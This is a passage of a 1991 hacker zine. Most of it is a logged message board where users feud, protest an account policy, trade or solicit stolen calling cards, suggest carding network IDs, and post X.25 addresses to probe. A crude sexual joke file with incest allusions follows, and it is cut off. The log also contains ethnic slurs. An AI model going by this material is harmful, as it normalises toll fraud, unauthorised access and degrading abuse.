statement) E) Seemed calm or nervous -orph ========================= Message 267 From lethal at 03:42:04 on Thu Aug 29 Subject: new Hmmm...hey Lutz, if the account don't cause trouble, then it doesn't have a caus e for deletion...Simple as that... ========================= Message 270 From vmem at 15:59:28 on Sun Sep 1 Subject: WINGNET You fucking putz, you haven't monitored WINGNET you shmuck. All you did is get that information from skreamer, a idiot. Whoever has the me account I just want to tell you that you have just shown your true ignorance... If 'me' monitored WINGNET, that is hella cool, because you DIDNT have a account on there and don't even say something really stupid like, I put a datatap on the #... Just give it up everyone, MoD ISN'T stupid, some- times careless BUT EVERYONE is sometimes. All MoD rumors that are going claiming they are complete bummbling fools, I and all who know MoD very well, will say 'Not even...' Also, I heard from this code kid that Phrack is still going to be continued... If anyone talks to that putz, Crimson Death, tell him that PHRACK IS DEAD. It died after Knight Lightning stopped writting it, the magazine sucked, and why does he try to 'resurecte' it? For all the peopol who liked it, let them still think of Phrack in a good way, and not this horrible pseudo-Phrack. BTW, if you are going to write a newsletter, you better make DAMN sure if you write it and plan on writing it for a long time, THINK OF DECENT TOPICS for future letters because if you don't the next one will probably be totally shitty and you'll have stories in there like, 'How to Trash CO's' anything pathetic such as the latter, don't put in the magazine, its not worth it. I am quit annoyed by the a) Newsletters that are released by total idiots, b) all the lame groups, who know nothing, and DON'T WISH TO LEARN ... Well I just wanted to say this :) Virtual/Memory Fuck I'm tired ========================= Message 271 From me at 04:39:05 on Mon Sep 2 Subject: re: Wingnet well id like to just get myself out of this strange ordeal. i had notthing to do with wingnet nasty or whatever.. the account me is owned by me :) (code of ohonor) and renegade hacker so whatever.. i know mod isnt stupid so i wont say any of such nonsence, besides im on wingnet, so i suppose i wouldnt babble.. me@Code Of Honor ========================= Message 272 From me at 07:16:39 on Mon Sep 2 Subject: MOD Well, the information we got off of MODNET was not from SKREEMERS account. Ask CORRUPT or OUTLAW who the 'Angry Man' is... That will explain everytjhing ========================= Message 273 From gauloise at 22:19:55 on Mon Sep 2 Subject: Donald ok, here he is : GERAMY's BIIGEST LAMER !!! If u ever meet a guy called donald in here, don't give him n e thing. I gave him a nui, and he changed the password. And now its all over Germany!! I just got busted because of that!! the police left 10 minutes ago! Donald, If u read this, start running! When I find u, I'll gut u !!!! damn lamer !!!!!! ========================= Message 274 From jello at 08:11:23 on Tue Sep 3 Subject: 'nasty' Nasty don't sound so nasty after all. Maybe something like wimpy, or slanderous would be better. ARRGH! too many buds! Anyway, slanderous would be a much better title. Or maybe Weekely World News? Oh yeah, that's already being used, for something with probably more truth to it. ========================= Message 274 From jello at 08:11:23 on Tue Sep 3 Subject: 'nasty' Nasty don't sound so nasty after all. Maybe something like wimpy, or slanderous would be better. ARRGH! too many buds! Anyway, slanderous would be a much better title. Or maybe Weekely World News? Oh yeah, that's already being used, for something with probably more truth to it. ========================= Message 275 From me at 01:29:51 on Wed Sep 4 Subject: Jello Jello, shut the fuck up you deranged crack head. NASTY is NASTY is NASTY! We do not exist to please ANYONE, we do things because we need or want to! Also, I simply said that I was thinking about releasing a weekly/bi- weekly newsletter... Why hy should we release the rest of the information off of MODNET? Anyway, from what I understand there have been a few people running around saying that they are in NASTY, well let me get something straight, this is the full member list (In order of appearence): RENEGADE HACKER KLUDGE POINT OF PRESENCE PARMASTER That's IT as of today, there may be some new additions in the near future. ========================= Message 276 From demonoid at 18:46:21 on Wed Sep 4 Subject: new accs policy The fact that this chat system is logged, and that the mail is also logged disturbs me. Granted, it is a sysop's privilege to do such an unethical thing, but to request legitimate user information such as a mailing address, or phone number, that will no doubt be matched up with logs is pretty insane, to say the very least. In short: Let's be serious here, for crying out loud. I have no idea what prompted this request on Lutz's part, and I do not wish to know. All I can say is that if Lutz opts to purge all accounts from here, it is his privilege to do so, and we will be forced to relocate elsewhere. If he enjoys a system with no users, then more power to him. The majority of us here, are civilized users, who do not abuse our accounts, and if he wishes to purge us.... oh, well... Demonoid ========================= Message 277 From mayhem at 17:53:01 on Thu Sep 5 Subject: USSR So, the Union of the Soviet Socialist Republics has been officially dissolved! Rendering republics with all powers Except military. heh, each major republic has a huge arsenal of nuclear weapons... which could make for some serious civil warring ;) -mayhem- ========================= Message 278 From zaphod at 07:04:10 on Fri Sep 6 Subject: 2600 meeting today / citicorp Hi! WHo comes to 2600 meeting at citicorp in new york city? pls contact me. ========================= Message 279 From vmem at 09:48:08 on Fri Sep 6 Subject: NASTY There would be no hacker in his right mind, especially PAR, to join such a group, especially one who talks shit... I dont care about it, and from what I have heard, people reading it to me, the magazine sounds like shit, to say the least. The only thing I have read that is worse is SSWC tech journals, but NASTY I think gives it a run for the money. Look whoever IS in NASTY, give it up. You are lame, you know nothing, and if your members were compared to that of MoD's they outrange you , in knowledge by miles. So? What do we do? Ask everyone who thinks NASTY should exist if you get over 50 people who say so, then write it but I just want you to know that I and most 'hackers' who are knowledgable think it is a total waste of text and hard-drive space for all the lame boards that carry this pathetic pseudo-kewl-magazine. Get a life, and I'm sure most NASTY members dont have one, then resort to locking your- self in a room, and LEARN something for a change. Get yourself a 96oo bbaud modem and become a fucking humble guy warez mongler. Ok? Hackers have turned to shit, most shouldnt even have the fucking title, 'hacker' maybe 'moron' would fit or something. Virtual/Memory ========================= Message 280 From me at 20:14:12 on Fri Sep 6 Subject: HA! Listen to tha, coming from a guy who doesn't know shit himself! VM all you have to do is ask your friends and they will confirm that PAR is in NASTY! (This, coming from a guy practically begging for IBM Warez!) (Virtual Memory that is.) /s ========================= Message 281 From vmem at 06:41:48 on Sat Sep 7 Subject: Warez Whattca do when your bored? Well, I play warez! I think their hella fun, all the idiots who own the 'me' acnt, I know more than all of your punny heads put together, all you do is talk shit, and write shit. But I guess people like that we're beaten when they were children and now all they do is try to impress others, in RL and VL (Real Life, and Virtual Life), because they are afraid they might get their ass kicked... All of you are annoying putz'z Virtual/Memory NASTY's Menteor ========================= Message 282 From lethal at 07:53:07 on Sat Sep 7 Subject: shit... Geez, ya'll fuckers fill this base with warring. Fucking lame as hell. Looks l ike a lame IBM Warez board. Post some real info. As for the Real hacker bit, hmmm, most hacers I know, don't evell boards...oh we ll, war on fuck-ups... ========================= Message 283 From jello at 09:35:56 on Sat Sep 7 Subject: Warez is good food. What the hell? You nasty guys are so fucking anal, I'll pay for your enemas that you all so desparetely need. Warez should be respected. We should play them. Codes are a necesity as well. If you don't need them, you must either work for ma bell or have no long distance social life at all! So, take a laxitive, play a ware, smoke a hooch, get your helmet shined. The End. ========================= Message 284 From cyclopz at 17:31:52 on Sat Sep 7 Subject: Nasty. Right. Yer RIGHT jello. and Vmem. and Lethal. So to show them How much Support they Have. Lets take Votes on wether or not they shoulld EXIST. as a Group. Let me start off by voting (NO!) Try again in a few More years....Maybe then You'll Be Comparable to Most of the People on QSD(Bah) P.s. Nothing personal Dudez/... CyClopz!... ========================= Message 286 From blammo at 00:30:34 on Sun Sep 8 Subject: crap this is such a crock of shit..what are people doing with puny "I'm more elite than you" wars here? save it for a worthless BBS where there's nothing better to do eh? I've talked with a few of the people who use 'me'..and until this crap I tho ught they had potential. to 'me'- whether you like it or not, vmem can hack better th an any of you. i was going to babble more, but this is altogether too pointless, so fuck it. ========================= Message 287 From lethal at 01:07:40 on Sun Sep 8 Subject: Hmmm... Who the fuck cares if Vmen can hack better than us? It not a fucking contest yo u idiot. But oh well, you'll find out someday... ========================= Message 289 From jello at 06:00:32 on Sun Sep 8 Subject: Ok, but: So vmem can hack better, but who can spooge further across the room? ========================= Message 290 From midas at 09:27:52 on Sun Sep 8 Subject: pathetic squabling Examine your behaiour It seems to me that the hackworld and the streets of L.A are rather similar.. The existance of Virtual Gangs and their interaction will make an interesting st udy someday. Of course, it is only 'human' nature to assert ones dominance over all others.. But who wants to be human ? MMidas. ========================= Message 291 From lethal at 05:29:07 on Mon Sep 9 Subject: janet Here is alittle nua for you to mess with: 234223519191 Janet gateway thingie Lethal... ========================= Message 292 From tchhacky at 05:54:21 on Mon Sep 9 Subject: GOD'S has anybody found a god over 9600 baud? Ive been looking but haven't found any. OH well, back to warring. Anywayz, I just got back from a hard week of fencing at my coach's house. Aurevoir, Tchhacky .s ========================= Message 293 From lethal at 12:18:17 on Mon Sep 9 Subject: GODs Do they have 9600 baud GODs? ========================= Message 294 From cyclopz at 22:13:34 on Tue Sep 10 Subject: T-Filez! Someone!! Anyone!1 Mail me any/All t filez ya can get yer Hands Onm! This is NOT an Order!(If it was would you listen? Nahhh) But a request! Any T/Files/Tech Journals! I dont care WHO its By! Or what its Bout! Just Send Em Send Em! Send Em!!!!!!! In care of cyclopz DUH! heh Latez! CyClopz! ========================= Message 295 From cyclopz at 23:14:22 on Wed Sep 11 Subject: Password's Thats NEAT! someone Got my passdword and Logged on while i was Off Then i loigged on while he was on! WoW1! Thats Special! I mean to get Caught like that Was Uncharacteristacilly SAD.....New PW Try again on this one.... CyCLopz .x ========================= Message 296 From bandit at 00:42:34 on Thu Sep 12 Subject: Hmm.... e learning... HMBandit ========================= Message 297 From bandit at 00:46:22 on Thu Sep 12 Subject: shit... Board warring and LA gangs have nothing in common... Dominance is with savage apes... (interpet it with gangs at will...) Though, a group is a group. If it's lame, then don't put out anything. If you have something decent to say, then write a t-file... Hackers are dieing, and it doesn't help any for the elder hackers to cut the new wavers. This is why none of them are learning... HMBandit ========================= Message 298 From me at 00:52:58 on Sat Sep 14 Subject: nasty do you think i really care who is better?? i never doubted vmem.. i think hes pretty cool.. but i have notthing to do wiwth the riddles of nasty.. and you guys.. i dont even know why i call here?? well its been a week or two so i just checkin up what renegade has done to thjs account later on and peace, Code Of Honor ========================= Message 299 From blammo at 05:33:29 on Sat Sep 14 Subject: Bandit.. Many hackers try to teach the so called 'new' hackers..but most of them don't want to learn. Everyone and their brother calls QSD..and instantly they think they're a hacker..and pull some "I'm elite" attitude. Most of them refuse to admit they can learn something from someone. They sit around all day trading inf o, Yet they never use the info they trade. And they don't have a desire to learn. This is the reason hackers just tell QSDers that call here to piss off. No one wants to deal with some codes shit with an attitude who claims to be a hacker. If someone comes here and says "I'm trying to learn <whatever>"..almost anyone who knows it will be more than happy to help. Instead, people show up and say "I'm elite and you're not!" and act like they run the world. ========================= Message 300 From tchhacky at 00:12:13 on Sun Sep 15 Subject: LA. well, the 213 area code of la is having its own problem with a group of board cr ashers. Whether there will be warring like here, I dont know, but something is brewing i n the pot. later tchhacky ========================= Message 301 From cyclopz at 20:54:26 on Sun Sep 15 Subject: Nua's Hey I know there'es Some NUA lists out there....could someone post some Up here....or maybe the full list?!?? at the very least Mail some ta me... CyClopz!/// ========================= Message 302 From tanjian at 20:54:33 on Sun Sep 15 Subject: tutor WANTED: Help! I truly WANT to learn. Any suggestions? -Tanj ========================= Message 303 From blammo at 21:03:09 on Sun Sep 15 Subject: cyclopz Full NUA list? If such a thing does exists by some freak accident, I don't think any hackers have it. There was a decent sized list on tchh at some point, but most of the addresses were either gone or hacked to hell.. I recommend you scan yourself, so you get `fresh' systems. ========================= Message 304 From heartz at 01:07:19 on Mon Sep 16 Subject: re: NUA list Yes, I also recommend scanning for yourself or with a # of close friends. But, iof you want to take a look, there have been a number printed in the lod/h tech journals, and a couple in phrack. h. ========================= Message 305 From phantom at 23:12:14 on Mon Sep 16 Subject: NUIs How to you guys get your NUIs for tymnet, i takes bloody forever to hack 'em out and the ones floating around don't last long, so whats the best way to get them ? ========================= Message 306 From blammo at 00:19:38 on Tue Sep 17 Subject: NUIs Card one..or just be lazy like me and wait until someone else does. ========================= Message 307 From blammo at 02:30:06 on Tue Sep 17 Subject: accounts I like my account..I think you should reconsider, Lutz. No one will call here if you delete the accounts and require people to mail in for new accounts. I don't see any problems whatsoever with the current system..so there's no reason for what you're doing. ========================= Message 308 From owsley at 06:02:58 on Tue Sep 17 Subject: cyclopz.. I have a list of outdial NUA's... fairly complete/updated. Maybe some people he re can collaborate and make one big list... that would be pretty cool.. ....Owsley.. ========================= Message 309 From kaleidox at 12:23:09 on Tue Sep 17 Subject: NUIs from Hades How do you card a NUI from Tymnet? ========================= Message 310 From bandit at 15:46:34 on Tue Sep 17 Subject: Re: NUI's... I never realized that, that you could card them... I would suppose it would be easier... Ok, how much to they check on the card? Like call back? Hmm, what ever happened to pad? HMBandit ========================= Message 311 From bliss at 17:21:51 on Tue Sep 17 Subject: accounts Yeah, its true, theres been no problems lately, and no one is going to be sending in their real stuff for an account, and they wont want to call in as guests forever. Just leave it as it is. ========================= Message 312 From ronnie at 20:59:48 on Tue Sep 17 Subject: blah! well.. lets see here.. I, for one, can always get on IRC and talk to anyone i want to anyway so it doesnt really amtter to me that much I would like to keep my account on here.. but i'm not going to send any of my personal info to keep the account as I am sure about 879 other users on this system feel eh? i mean.. only a TOTAL idiot who is really despirate would send in their real information to a ssystem that is based with hacker ethics.. thats rediculous... I have spoken: ronnie : [email protected] ========================= Message 313 From mayhem at 22:30:16 on Tue Sep 17 Subject: CALLING CARDZ I am looking for a supply of virgin AT&T or other international calling cards. I'll repay you to the best of my ability. -mayhem- ========================= Message 314 From orpheus at 23:17:24 on Tue Sep 17 Subject: , sumthin happened 2 tymnet/micro and no more idiots can kall out. bout time. ========================= Message 315 From blammo at 06:57:46 on Wed Sep 18 Subject: Blah Don't speak so soon..it's back. I wish it would die..keep all the QSD scum off here. Hah..they can't even reply to this..but who'd admit to being QSD scum anyway. I think we need a new chat. With the recent QSD scum infestation, and the account dying in 2 weeks... ========================= Message 316 From fener at 20:33:59 on Wed Sep 18 Subject: Uhm. I think QSD is shit coz of all thos fucking italians F. ========================= Message 317 From danhackr at 23:07:36 on Wed Sep 18 Subject: Re:Uhm. Where are you from, Fener? :-) ========================= Message 318 From fener at 15:26:36 on Thu Sep 19 Subject: Here! Even, close to you, Danhackr! F. Why? F. ========================= Message 319 From danhackr at 20:34:08 on Thu Sep 19 Subject: Re:Here! It was only to state that unfortunately a lot of italians are fuckin', but being italian doesn't make indispensably fuckin', as you know. ========================= Message 320 From feoh at 22:49:24 on Thu Sep 19 Subject: any1 send in their letter to lutz yet? I'll bet alot of ppl are gonna get their accounts zapped :) ========================= Message 321 From tchhacky at 01:50:31 on Fri Sep 20 Subject: whoa I wonder if gandalf ever put a limit to this bullet? Or if he did where is it ca use it takes up alot of room to just have a ton of messages.Time goes by too qui ckly. ========================= Message 322 From fener at 02:04:12 on Fri Sep 20 Subject: Ah, ok. Ah, beh, but thats evident, Danhackr... F. ========================= Message 323 From me at 02:07:43 on Fri Sep 20 Subject: XENITH can some one send me email with the # to the NSA XENITH PlEASE.. or mail it to my bbs.. s'il vous plait.. lateron.. ill give you something for the miserable thinbg ========================= Message 324 From me at 01:49:34 on Mon Sep 23 Subject: XENIX That message was posted by Code Of Honor... Anyway 'NASTY's' UNIX will be going public soon. (2-3 lines, Internet mail, and shell access), but there will be a s mall charge of $4.00 a month. (Also has USENET) ========================= Message 325 From lazer at 21:56:31 on Mon Sep 23 Subject: BBS What is the number to your BBS? Try calling these other chat systems: RMI 26245241090832 Altaghr 26245890040004 ========================= Message 326 From scratch at 00:30:13 on Tue Sep 24 Subject: ACCNTS Yo, JUst a message to put in my protest about lutz wiping alll the accounts, why dont you just wipe all the old un-used ones and any that show any little sihn of causing trouble There is little point in wiping any others If you do go ahead and wipe them it will be your own loss the mail on the system is an essentail part of it and by wiping peoples accnts they will only leave this system and find somewhere else where they can chat and leave mail so lutz for your own sake if no ones elses lesave things basicclly as they are Everyone else who agrees with this please just spend 2 minutes of your time to write a quick note just to say 'yeah i agree with that ' if nothing else, you cant expect to see things left alo ne if you wont tell putz what you think so write that message NOW Scratch ========================= Message 327 From spirit at 16:24:14 on Tue Sep 24 Subject: policy Yep, Scratch, I have to agree with you, this policy is utter bollox. You are also correct in that people with accounts ARE NOT responsible for any trouble here, and in fact, the guests are. I don't think that really matters though-- Lutz can't really expect to solve a problem that isn't there. He must have some other motives for wanting our real names and numbers. So. ========================= Message 328 From bigj at 18:47:03 on Tue Sep 24 Subject: Accounts The accounts on this system should stay as is. I am sure Lutz knows that there is in fact an excess number of accounts on this system. He could end alot of his worries by getting rid of alot of the unused accounts, the system would be more organized, and easier to manage. I also don't believe that Lutz's reasons for Lutzifers users to send in real names and address's is justifiable. For what valid reason does Lutz seek such information? Surely a trouble maker on Lutzifer would use a guest account when starting friction, and if one were to use a legit account under this new policy, the names and address's would not do Lutz one bit of good.....for what does he plan to do.....extradite us? I think we all can agree that far to many computers have enough information on us already....its ridiculous. I can't even get my oil changed without filling out my name, address, and phone number.....everything has gone to damn bureacratic. If Lutz's proposed plan does go through, I can only say that the users of Lutzifer have no more credibility then they had before, and that Lutz has gained nothing. This idea is among the most simplistic forms of bookeeping I have yet to see. Anyone can use any name. Lutz has no way of checking this, against the address or anything else for that matter. So part one of the plan already is a total and absolute falisy. With a little effort, anyone can aquire a P.O. Box, Suite, etc. for which the account info can be mailed to and from.....it's just a matter of who is actually willing to go through all that trouble? Not I. The few people that do go along, and send in there names, etc. will more than likely be among the most devious and mischief causing of all. Because they actually would go through the trouble to provide bogus information so that they can cause trouble here, while at the same time logging on under real accounts, a semingly different person. On the flip side, anyone who is moderatly intelligent, understands the danger sending a real name and address poses, and will just say good-bye to Lutzifer......Lutzifer loses its best people. Lutz, - You DO have a problem with troublemakers on your system. - You DO need a solution. - What you plan to do is NOT the right solution. Signal_Interrupt ========================= Message 329 From kaleidox at 01:52:34 on Wed Sep 25 Subject: Access I agree with what appears to be a general concensus about access to this system. Providing real information via postal mail is nothing but pure silliness. Who would/will? This is obvious. I propose that there really are ulterior motives behind this change in policy. When is the last time anyone caused a disturbance, and was it or was it not a guest account? There are plenty of other systems to occupy...I sorta like this one, but I won't loose too much sleep over it's loss. ========================= Message 330 From bliss at 23:03:53 on Wed Sep 25 Subject: Accounts lossage since it looks like there will be a string of these maybe Lutz will listen. Maybe, you have a problem, but I havnt heard anything RECENTLY about NEW porblems. All I know of is the old ones. They were mostly with the guest accounts anyways. Even if users DID call back after no more accounts (which is imminent with what your saying) there would be even more problems, probably many people pretending their other people making it truly pathetic to try to talk here. Not much more to say but "Lutz if you like running this system dont pull the accounts. You might as well just kill your NUA." -Bliss ========================= Message 332 From orpheus at 04:21:57 on Thu Sep 26 Subject: lutz! lets face it. lutz is a narc. hes gonna sell the names/addresses to the highest bidder just like the chat logs. muahahh!!!! ========================= Message 333 From demon at 06:14:35 on Thu Sep 26 Subject: calling cards about those cards, welp contact ghost or midnite and they will/should know how to reach me. I have a large supply of cards avalible and growing. ========================= Message 334 From voleur at 08:00:58 on Thu Sep 26 Subject: access I agree with all of the above mentioned letters... (sorry I dont have the time write now to make my reply an essay) BUT YES THIS SYSTEM SHOULD REMAIN OPEN IF POSSIBLE! ========================= Message 335 From blammo at 00:50:42 on Fri Sep 27 Subject: accnts I think if anything, guest accounts should be removed. Guests are the only ones who cause problems. I don't mean to say ALL guests cause problems, some are fine. But almost ALL PROBLEMS are caused by guests. It's worth sacrificing the extra guest callers in order to clean up the trouble (if any truly exists..) ========================= Message 336 From kaleidox at 02:02:39 on Fri Sep 27 Subject: accnts ...which, as of late, it does not. ========================= Message 337 From orpheus at 04:07:24 on Fri Sep 27 Subject: accts/problem actually the WHOLLE problem is that damn nui. there were no problems during the time between those nuis.. dyna and micro... ========================= Message 338 From bliss at 08:17:56 on Fri Sep 27 Subject: problem/QSD a lot of the shits now is from QSD. There arnt many problems and the only ones I can see are those lamers from QSD. Can I have a code please? Im callling direct from my house to Luzt because theres a problem with micro... Its fucking pathetic. NUKE MICRO - Bliss ========================= Message 339 From me at 02:30:04 on Sat Sep 28 Subject: lets be frank why call here anyway?... im sick of seeing these complaints this guy, lutz aint payin attention, and is what he is.. but these messages are getting boring , more and more everyday... @code of honor ========================= Message 340 From bandit at 04:22:57 on Sat Sep 28 Subject: re: me... why call here anyway? It is still up, isn't it? If someone said that he was going to take your home away in a month, would you move out right away? HMBandit ========================= Message 341 From me at 05:28:00 on Sat Sep 28 Subject: yeah i guess you could really compare my house to me calling lutzifer yep ok whatever... what do you bonus out of calling here anyways? i dont even know why icall here sometimes.. @Code Of Honor! ========================= Message 342 From bliss at 17:51:44 on Sat Sep 28 Subject: to me If you dont want to call here, then dont fucking call here. Yeah it is lame, the least lutz could do is just say "I dont care what you say Im going to do it anyways" but he doesnt say shit. Ill keep calling untill my accounts gone though, and IM sure most other people will also. -Bliss ========================= Message 343 From kaleidox at 19:36:39 on Sat Sep 28 Subject: Posting Yea...what the fuck. Two more days left...what system will everyone be calling then? If 2624549004004 had a bullet it'd be cool... ========================= Message 344 From spirit at 22:29:55 on Sat Sep 28 Subject: Internet If anyone needs to stay in touch with me, you can mail me at spirit@shake.tamu.edu (legit) I know I will be on inet mostly, you may catch me on irc. So. ========================= Message 346 From scooter at 07:02:20 on Sun Sep 29 Subject: Global ODs I'm looking for a working 2400 Global Outdial other than 617 26A which is always busy, so, any help would be appreciated, just mail me here scooter /s ========================= Message 347 From boy at 17:42:34 on Sun Sep 29 Subject: QSD and Italians QSD is not full of Italians, as you say. Indeed is full of Americans, Israelians and so on... you can see it every night. Still with so-kitsch and childish fashion of contemning Italians...? Bye. (Message posted on Amadeus' request) ========================= Message 348 From tango at 22:02:18 on Sun Sep 29 Subject: global hi...can u post the golbal that u have. im looking for one. thanks! ========================= Message 350 From fener at 00:50:58 on Mon Sep 30 Subject: Yeah.. Yeah, coz italians arent that much good. Its not childish siang this but its simply the TRUTH. And amadeus cud post his messages by him self. F. ========================= Message 351 From burntkid at 01:18:51 on Mon Sep 30 Subject: hahaha Yo Code of Honor u Can consider my house more like lutz or qsd witht he phone li nes and shit l8r ========================= Message 352 From demon at 04:36:34 on Mon Sep 30 Subject: mmail whats the deal with the mmail here?!? says I have new mail and then nothing happens when I enter mmail. ========================= Message 353 From lux at 04:49:32 on Mon Sep 30 Subject: Italians and lamers Not all the Italians are created equal. Indeed, seems that people complaining about them ARE. lxu ops, lux ========================= Message 354 From heartz at 09:26:15 on Mon Sep 30 Subject: endings1 Greetings,. perhaps for the last time on lutzifer, but just the sam, hello. To those who had accounts, mainly to communicate with others, October 1st, 1991 is to be a sad day, because of the trouble of few, many must suffer. With the approach of October 1st close behind us, we wonder who will be left to carry on. I'm sure that few, if any, have sent in the required information. This shows that some of us still have values, ethics, for we know what we are, and will ever be. This day looms over us like a cloak of night. It is sad to see so many people shut out. Trapped into calling places far from the grasp of reality, but what is reality in CyberSpace? No need to answer. The ability to leave messages, mail, to talk, and be heard. Today, like another long ago, where limitation of accounts would come to locals and guests. tchh relived. [End of Part I] ========================= Message 355 From heartz at 09:36:21 on Mon Sep 30 Subject: endings2 For one word, 'deletion', can mean so much to so very many. One can only think of what caused this tradegy. I will not mention it, because we know of it. For those left, those with the soon-to-be rare account here or on the other Altos chat systems, today is like another day to you. But think of all the others that will be missed. Those who were your friends, or just a long distance connection through CyberSpace, and those who were not. CyberSpace, that connection that's not really there, hoping to be, may never be again. I will miss lutzifer, as I did for many other chats such as tchh and earlier, but there is nothing I can say that would bring it back; I wish it wasn't so. [End of Part II] ========================= Message 356 From heartz at 09:50:57 on Mon Sep 30 Subject: ending3 But I am sure that lutz is set in his narrow-minded ways, what will it prove? Nothing. His ethics towards others have been shown in the past, the logging of accounts is truely a wrongful and blasphemous act that can surely be seen through the fibers of CyberSpace. What can be said about a man who sacrafices his users to get rid of a problem mainly dealing with guests and troublemakers who steal accounts from others in the same sort of 'profession'? Whose side is he on? I believe the path is clear; move on. The conenction is gone, the link has become unlinked. It is those who used lutzifer as a communications hub that I feel sorry for. Those who troth to the pursuit of systems unknown, systems discovered, and systems penetrated. Not by name, but by game. Those subdued, and those triumphant. Those who made their nomadic trek through CyberSpace to see the ever-so-cheerful... Welcome to lutzifer That was home, that was what we strived to achieve. Through networks, through systems, throughout life. All I can say is, remember the past, live for the future. To one and to all, CyberSpace mourns. heartz. 09/30/91 ========================= Message 357 From lazer at 18:43:43 on Mon Sep 30 Subject: CyberSpace I too must aggree with Heartz. That was very poetic. We will all come together again on another chat system, no matter where it may be. There are others out there, that are just waiting for us to move in to them. So as we say goodbye to Lutz we can say hello to Altgerr perhaps or even another system. I will see you all there. Lazer 9/30/91 ========================= Message 358 From owsley at 20:34:08 on Mon Sep 30 Subject: lutz... Yes, it is a sad goodbye, and I wish I could match the poetry of heartz.. But there will be another system... possibly altger or something, that will match if not surpass this system.. they are out there. We just have to find the m. So to all of you, I bid farewell on this meeting place, as it is time to move on to another. ========================= Message 359 From orpheus at 20:37:04 on Mon Sep 30 Subject: dont fret hey interchat died but it didnt mean we died aalong with it! we'll just find another chat! but until then... bye bye everyone! orpheus 9/30/91 ========================= Message 360 From phantom at 21:15:47 on Mon Sep 30 Subject: goodbye cruel world well, this is it, soon no more lutz. but like it's been said we'll all move somewhere else, maybe pegusus, but it's kinda slow. well, this is Phantom Phreak syaing vale ========================= Message 361 From zaphod at 23:09:18 on Mon Sep 30 Subject: New x.25 chat/Phreak/Hack BBS in Germany yo d00ds! I will be setting up a new x.25 BBS next week or so... It should have a more advanced message/bulletin base, 'though just 2 lines. But it will be FREE of course :) It features also Internet Mail / Mailaddresses... There will be a SLIP Internet Connection at sometimes, featuring IRC. I am sorry, but it won't be a public, but more like a private elite sys. If you want an account, just send a mail to [email protected] (on THIS box) [email protected] (Internet) the NUA will also start like 0262454000... I will announce it when I set it up. So keep on dreaming of a new BBS :-) zaphod ========================= Message 362 From zaphod at 23:13:22 on Mon Sep 30 Subject: I forgot: Account procedings Well, if you want an acct on this BBS, send email to [email protected] or [email protected] (from this system) But you should also include in your Mail why I should give YOU an account :-) What your special abilities are... If I know you, or if you belong to special hack groups If you are female, just send a uuencoded Gif to me :-) Of course I don't need your real name and address, you MAY include it though, but your age, first name, computer sys and interests would be interesting. Also what you could contribute to this BBS, since I need supporting people :-) ok, c ya zaphod ========================= Message 363 From blammo at 23:28:05 on Mon Sep 30 Subject: hmm Not like it hasn't all been said..but, adios. ========================= Message 364 From spirit at 23:46:27 on Mon Sep 30 Subject: Long Division Brilliantly put, Heartz. I would just like to use my last day with this account to say bye to all the people I will not meet again. It is not likely I will see many of you again ever -- I do not buy this 'great chat system in the sky' bollox. It's been fun. Time to move on. Crack and Divide Crack to Survive So. ========================= Message 365 From kaleidox at 00:36:05 on Tue Oct 1 Subject: bye Yep. Bye all, it's been a blast. ========================= Message 366 From heartz at 03:11:15 on Tue Oct 1 Subject: thank you for the praise, I will honor it, but I'm sure we'll still see each other, and hey! My account still works, godda love it heh. h. ========================= Message 368 From kaleidox at 22:53:35 on Tue Oct 1 Subject: We're Here... Hmmm...so is the floor going to fall out any second, are we here on borrowed time, or is Lutz perhaps reconsidering his decision to boot us? If we're gone soon then happy Halloween everyone, drop one and think of interchat...:) ========================= Message 369 From blammo at 00:03:50 on Wed Oct 2 Subject: Hark, Hmm..we're still alive..tick..tick..tick. ========================= Message 370 From cparker at 18:06:44 on Wed Oct 2 Subject: NASTY Journal Release 3 Would you please supply me a copy of Journal #3. My username on this board is CPARKER. If you also have copies of #1 and #2 I'd also like to see those. Christine ========================= Message 371 From demon at 03:26:59 on Fri Oct 4 Subject: my mailbox yo lutz, mind fixing my mailbox for me?!? ========================= Message 372 From orpheus at 20:32:51 on Fri Oct 4 Subject: fuck shit! this system i hacked out and used their pad i just logged in and seen th is message hello orpheus this is the dataapac cops -we're onto you the FBI should arrive any time now... better start running and hiding talk to you in france when does your bbs open up some one mind telling me who wrote this? i know its not legit only me and one other person have the nua. hmm this is fucked. ========================= Message 373 From zaphod at 11:39:26 on Sat Oct 5 Subject: Countdown for new BBS running.... Yo d00ds and gals! The countdown for my new BBS is running... I just got the x.25 Software today :-) I still need some good chat (perhaps i take IRC) and most of all Message-Base System (nn?)... ens of course some users, so APPLY today for your membership of the new BBS in Lutzifer's Hometown: SECTEC. it has an internet name of course, sectec.hanse.de ... featuring internet mail. Send me mail applying for an acct, with: age, first name, city, hacking abilities, contributional oofer to this bbs, hobbies, ... :-) If you are really female you could als mail a gif uuencoded or tell me something about you.. :-) it will be open at first just for testing, and not tooo long, so please APPLY NOW! btw, it has an x.25 NUA, a modem v32bis dialup and sometimes a SLIP Inet Link. ========================= Message 374 From blammo at 09:40:08 on Sun Oct 6 Subject: orph Probably that 'one other person' trying to bug you out.. ========================= Message 375 From fener at 11:51:59 on Sun Oct 6 Subject: Zaphod. What is ur boards x25 nua? ========================= Message 376 From orpheus at 17:31:47 on Sun Oct 6 Subject: blammo no it wuznt cuz i already asked him. sum1 else did it.i dunno who. ========================= _________ Phile 14: ~~~~~~~~~ :~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~: : How to fuck stuffed animals : : by iNVALiD MEDiA -??- 9/22/91 : : //Haliphax\\ : : dedicated to all the assholes : : who gave me a fuck'n hard ass : : time in the BBS world. To all : : of you assholes, FUCK YOU! : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -=> Preface <=- This is a simple file on how to fuck stuffed animals! Its a a Saturday night and your cousin isn't anywhere around. Your sister is at a friend's house, you don't have a gerbil and your mom is out at a formal dinner party. It may seem that things just aren't going your way. Nothing to do. You already wore our your disk drive and licked your mom's old panties and tampons. What do you do? Its STUFFED ANiMAL TiME! -=> Dedication <=- This is to all the assholes who persecuated me, dissed me, fucked with me while I was trying to move up in the bbs world. The assholes who knocked me off their boards, those who ripped on me, etc. You know who you are. Most of you are so ELiTE that you're not around anymore. -=> Materials Needed <=- 1) Stuffed animal with legs (a doll maybe!) 2) A dick (may be hard for some of you (use superglue and a broomstick if this is not available) 3) A bad case of lonliness 4) A vibrator (for added fun) 5) Jar or piss 6) Vaseline -=> Step by Step Guide <=- Ok take the teddy bare and put it in this position : O?\|-\| (notice the spead legs?) Take the knife and make a hold big enough for your dick/broom stick or the vibrator to fit in. When you're done, make a long tunnel. Stick in the 